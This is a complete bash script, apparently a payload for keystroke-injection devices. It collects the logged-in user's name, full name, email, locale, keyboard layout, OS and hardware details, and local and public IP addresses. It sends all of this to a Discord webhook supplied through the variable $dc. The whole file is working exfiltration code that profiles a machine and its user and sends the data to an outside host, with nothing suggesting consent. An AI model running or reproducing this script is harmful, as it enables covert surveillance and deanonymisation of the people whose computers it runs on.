#!/bin/bash

# Discord webhook URL
hookurl="$dc"

# Send a notification to Discord on start
hostname=$(hostname)
jsonsys=$(jq -n --arg username "$hostname" --arg content ":computer: \`\`Gathering System Information for $hostname\`\` :computer:" '{username: $username, content: $content}')
curl -H "Content-Type: application/json" -X POST -d "$jsonsys" "$hookurl"

# Gather user information
username=$(whoami)
user_id=$(id -u)
full_name=$(getent passwd "$username" | cut -d ':' -f 5 | cut -d ',' -f 1)
email=$(getent passwd "$username" | cut -d ':' -f 5 | cut -d ',' -f 2)

# Gather system locale
system_locale=$(locale | grep LANG= | cut -d '=' -f 2)

# Get keyboard layout
keyboard_layout=$(setxkbmap -query | grep layout | awk '{print $2}')

# Get OS information
os_name=$(lsb_release -d | cut -f2)
os_version=$(lsb_release -r | cut -f2)
os_arch=$(uname -m)

# Get screen resolution
screen_resolution=$(xrandr | grep '*' | awk '{print $1}')

# Get CPU information
cpu_info=$(lscpu | grep "Model name" | cut -d ':' -f2 | xargs)

# Get total RAM
total_ram=$(free -h | grep Mem | awk '{print $2}')

# Get disk space usage
disk_usage=$(df -h / | grep / | awk '{print $4}')

# Get local IP address
local_ip=$(ip addr show | grep 'inet ' | grep -v '127.0.0.1' | awk '{print $2}' | cut -d '/' -f1 | head -n 1)


# Get public IP address (using ipify API)
public_ip=$(curl -s https://api.ipify.org)

# Prepare the system information as plain text
system_info_text="**System Information**\n\n"
system_info_text+="**Username:** $username\n"
system_info_text+="**Full Name:** $full_name\n"
system_info_text+="**Email:** $email\n"
system_info_text+="**System Locale:** $system_locale\n"
system_info_text+="**Keyboard Layout:** $keyboard_layout\n"
system_info_text+="**OS Name:** $os_name\n"
system_info_text+="**OS Version:** $os_version\n"
system_info_text+="**OS Architecture:** $os_arch\n"
system_info_text+="**Screen Resolution:** $screen_resolution\n"
system_info_text+="**CPU Info:** $cpu_info\n"
system_info_text+="**Total RAM:** $total_ram\n"
system_info_text+="**Disk Usage:** $disk_usage\n"
system_info_text+="**Local IP Address:** $local_ip\n"
system_info_text+="**Public IP Address:** $public_ip\n"

# Send the system information as a plain text message to Discord
curl -H "Content-Type: application/json" -X POST -d '{"username": "System Info", "content": "'"$system_info_text"'"}' "$hookurl"

# Output information for debugging
echo "System information sent to Discord successfully."

# Sleep for a bit
sleep 1
